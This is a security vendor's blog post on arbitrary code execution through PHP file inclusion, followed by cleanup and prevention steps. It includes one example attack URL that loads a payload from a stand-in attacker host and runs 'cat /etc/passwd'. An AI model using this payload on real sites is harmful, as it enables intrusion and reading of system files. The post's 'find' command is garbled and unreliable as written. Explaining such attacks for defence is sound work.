Arbitrary Code Execution Attack - Fixation and Prevention

In this age of the internet, many organizations have developed web-based applications to allow easy access and round the clock services to the user. But, poorly written code for web applications can be exploited to gain unauthorized access to user data and the web server. To begin with, arbitrary code execution (ACE) describes a security flaw that allows the attacker to execute arbitrary commands (codes) on the target system.

It means that any bad guy can command the target system to execute any code. The executed code might be an already existing code or a code inserted by the attacker using the vulnerability. In either case, arbitrary code execution attack lets the attacker to execute stuff on your system.

Related article – WordPress Sites at Risk From PHP Code Execution

How is arbitrary code execution attack performed?

To execute arbitrary codes, the attacker needs access to the website like a gateway. This gateway is achieved by injecting a malicious file.

Websites are controlled and managed through CMS and related extensions. These softwares are made up of files and folders. Certain folders are writable and allow uploading of files. Hackers by varied means upload a PHP file in such folders. Although these files don’t allow full control over the website, they act as a gateway. Files inclusion are of two types – Remote File Inclusion or Locally Local File Inclusion

The vulnerability promoting Remote File Inclusion (RFI) is largely found on websites running on PHP. PHP has a provision to ‘include’ or ‘require’ additional files within a script giving rise to File inclusion vulnerability. Validating the input before passing them within these scripts can considerably reduce the risks of such exploitation.

In the case of Local File Inclusion (LFI) the attacker uses files on the current server to execute a malicious script. A remotely included file could be used to include locally available files to perform malicious actions.

Related article – Magento Remote Code Execution : Insights & Solution

Example: How Arbitrary Code is Executed

With this example, let us see how exactly an arbitrary code execution attack is executed-

Parameter swp_url and swp_debug allows an attacker to perform remote code execution by passing the payload URL via swp_url parameter.

Example Attack Vector: http://examplewp.org/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://pastebin.attacker.com/payload.txt

payload.txt content: “<pre>system('cat /etc/passwd')</pre>

It’ll return the content of /etc/passwd file.

How arbitrary code is executed
How arbitrary code is executed

The end result was that the arbitrary code was able to extort an unexpected status from the server. This return from the server lets the hacker know which codes can get past the security bypass of the server. Having known the vulnerabilities, the hacker can now execute any malicious codes in the server.

Arbitrary Code Execution (ACE) Attack – Fixation

Code Backup

A code backup is very important because it allows you to analyze the infection at a later stage. You are advised to regularly backup code. It simplifies the process of hack removal. Even if you do not have a backup strategy in place, you can save your time by simply copying the unaffected, good parts of the code instead of beginning from scratch.

Many users recommend restoring a previous backup in case of an attack. This would surely remove the infection and your site will work as before. But, it leaves the security flaw unchecked.

Check core file integrity

Most core files should never be modified. The quickest way you can check the core files for infection is by comparing the current files with the original using the diff command in terminal. If no differences are visible, your core files are clean.

Check Recently modified files

If you have SSH access to your server, check the list of files that have been modified in the last few days since you noticed the hack. By using mtime command you can list the files that were modified in the last few days. It is used as follows:

Find .mtime -15 –ls

The above command lists all the files that were changed in the last fifteen days.

Clean Hacked Files and database

Remove all the malicious code. Delete files that the attackers might have included. After each file removal, it is important to ensure that none of the site functionalities and features are affected.

Pro Tip: The easiest way to identify hacked files is by comparing the present version of the site with a healthy backup.

To remove a malware infection from your website database is trickier. There are several third-party DB management tools like Adminer. Seek expert’s advice here.

Secure User Accounts

If you notice any unfamiliar and unusual users, remove them. It is recommended that there be only one admin user. Set other roles to the least amount of privileges needed. Delete all anonymous FTP accounts.

Change Passwords

Change passwords of your FTP account, SSH login, database, etc.

Update permissions for files and folders, limiting access to only what is necessary. Set 444 (read-only) permissions for files like .htaccess and index.php

Remove Malware Warnings

If you were blacklisted by Google, you can request a review after fixing the infection. The review will not take long. Your website will regain its SEO status within 24 hours of review completion.

There are services available which help you look through other blacklists. Although there are so many such services, you can use MX Toolbox. It checks your website against multiple lists and gives you an organized output. It should be noted that different blacklists have different review processes.

Arbitrary Code Execution (ACE) Attack – Prevention

Vulnerability Scanning

Schedule regular vulnerability and malware scans. This will allow you to address potential security issues in a nascent stage. Practice Dorking– Use Google search for hints of potential vulnerability, and remove their traces from web applications

Web Application Firewalls

A Web Application Firewall can blacklist referenced URLs to block zero-day vulnerability exploits of applications. A web application firewall can protect your site in multiple ways:

  • It detects attacks using application layer knowledge and a pre-configured database of attack vector signatures.
  • I can identify access patterns of automated tools
  • It can blacklist the hosts that are suspected hackers to quickly identify and block attackers in the future.

Blacklisting

Blacklisting IPs obtained from observing previous attacks could help prevent any future attacks originating from the same malicious source, thus tackling an attack before it even begins.

Disabling PHP execution

Disabling PHP execution in certain folders (writable folders like Upload in WordPress core) will go a long way in securing your website. Astra Security Service offers features that allow disabling PHP Execution.

Code Review

Don’t allow non-validated user inputs to enter file and include function parameters. Set Red Alert and Charge Phasers to maximum for any variable that uses ‘include’ or ‘filesystem‘ functions for input. Exercise due caution to validate the variable. Be careful while downloading third-party libraries. They allow non-PHP files to be passed to the PHP interpreter. This can be exploited by attackers.

Disabling Directory Indexing

it is essential to Disable Directory Browsing. Hackers can exploit directory browsing to reveal files with known vulnerabilities, and in turn exploit it to gain unauthorized access. One can easily hide a certain folder from being accessible to the public by modifying the .htaccess file a bit.

Check out: Disabling directory indexing in WordPress

Conclusion

It’s better to be safe than sorry. Hence, to stiffen your website’s security against such hacking attempts, it is recommended to invest in a premium security solution. Although there are many security companies around, Astra Web Security is a trusted name. Having Astra Firewall on your website adds immensely to your website’s security. Besides shielding your website from SQLi, XSS, CSRF, bad bots & 100+ coming threats. Astra Firewall also provides continuous and comprehensive monitoring of your website. To get a hands-on experience of this product click here.

Was this post helpful?

Waiting to Get Hacked?

Get security tips & latest vulnerability fixes right in your inbox:

About The Author

Mahima Maheshwari

She is an Embedded Systems Engineer and a cybersecurity enthusiast. She spends most of her free time researching & reading. And loves to spread knowledge through blogs.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Close